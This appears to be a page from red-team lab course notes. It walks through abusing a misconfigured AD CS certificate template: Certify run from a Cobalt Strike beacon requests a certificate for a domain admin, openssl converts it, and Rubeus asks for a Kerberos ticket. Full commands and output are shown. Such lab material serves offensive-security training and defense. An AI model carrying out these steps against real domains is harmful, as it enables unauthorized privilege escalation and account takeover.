Misconfigured Certificate Templates

AD CS certificate templates are provided by Microsoft as a starting point for distributing certificates. They are designed to be duplicated and configured for specific needs. Misconfigurations within these templates can be abused for privilege escalation.

Certify can also find vulnerable templates.

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable

\

\

Let's go through the key parts of this output.

  1. This template is served by sub-ca.

  2. The template is called CustomUser.

  3. ENROLLEE_SUPPLIES_SUBJECT is enabled, which allows the certificate requestor to provide any SAN (subject alternative name).

  4. The certificate usage has Client Authentication set.

  5. DEV\Domain Users have enrollment rights, so any domain user may request a certificate from this template.

If a principal you control has WriteOwner, WriteDacl or WriteProperty, then this could also be abused.

\

This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication. Request a certificate for nlamb.

beacon> getuid
[*] You are DEV\bfarmer

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

[*] Action: Request a Certificates
[*] Current user context    : DEV\bfarmer
[*] No subject name specified, using current context as subject.

[*] Template                : CustomUser
[*] Subject                 : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] AltName                 : nlamb

[*] Certificate Authority   : dc-2.dev.cyberbotic.io\sub-ca

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 11

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:05.4521116

\

Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL. Then use the provided openssl command to convert it to pfx format.

ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123

\

Convert cert.pfx into a base64 encoded string so it can be used with Rubeus

ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
MIIM7w[...]ECAggA

\

Then use asktgt to request a TGT for the user using the certificate.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap

[*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGQj[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  nlamb
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 8:51:22 AM
  EndTime                  :  9/7/2022 6:51:22 PM
  RenewTill                :  9/14/2022 8:51:22 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AliVFc5Nk93Z7IUkweCnBQ==
  ASREP (key)              :  4DB9D9D76701696109C28A26D27DE0B0
PreviousFinding Certificate AuthoritiesNextNTLM Relaying to ADCS HTTP Endpoints

Last updated